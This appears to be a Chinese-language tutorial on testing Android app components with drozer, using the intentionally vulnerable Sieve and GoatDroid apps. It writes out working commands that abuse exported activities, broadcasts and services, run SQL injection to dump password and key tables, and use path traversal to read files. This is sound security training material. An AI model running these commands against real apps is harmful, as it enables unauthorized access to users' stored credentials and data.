0x00 安装drozer

windows:

在github下载msi安装文件执行，装在local disk python27下。

pip install protobuf pyOpenSSL Twisted service_identity

下载drozer agent
https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

adb.exe install drozer-agent.apk

adb.exe install test.apk

开启drozer-agent enable

adb forward tcp:31415 tcp:31415

cd C:\python27\scripts:
drozer console connect

  

 

0x01 Activity

PWList的activity设置为了true，有被导出风险。

未授权访问
dz> run app.activity.start –component com.mwr.example.sieve com.mwr.example.sieve.PWList

 

0x02 Broadcast

receiver的exported未设置，可被利用。

 

发送恶意广播

run app.broadcast.send –action org.owasp.goatdroid.fourgoats.SOCIAL_SMS –extra string phoneNumber 1234 –extra string message pwnd

dos造成崩溃

run app.broadcast.send –action org.owasp.goatdroid.fourgoats.SOCIAL_SMS

 

 

0x03 Service

没设置exported为false，默认可以导出。

启动GPS位置服务。

run app.service.start –action org.owasp.goatdroid.fourgoats.services.LocationService –component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService

 

 

0x04 Content

列出可访问内容URI的列表和路径：

SQL注入：

 

0x05 相关命令

run scanner.provider.finduris -a com.mwr.example.sieve
run app.service.info -a org.owasp.goatdroid.fourgoats
run app.service.start –action org.owasp.goatdroid.fourgoats.services.LocationService –component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
–projection “* FROM SQLITE_MASTER WHERE type=’table’;–”
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
–projection “* FROM Key;–”
run scanner.provider.injection -a com.mwr.example.sieve
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data

run app.provider.info -a com.mwr.example.sieve

run app.service.send com.mwr.example.sievecom.mwr.example.sieve.AuthService –msg 2354 9234 0 –extra stringcom.mwr.example.sieve.PIN 1234 –bundle-as-obj

run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Keys/  –projection “* from Passwords;–”

run scanner.provider.traversal -a com.mwr.example.sieve

 

0x06 参考资料

https://www.freebuf.com/column/175218.html

https://www.freebuf.com/articles/web/165466.html

https://www.jianshu.com/p/dfa92bab3a55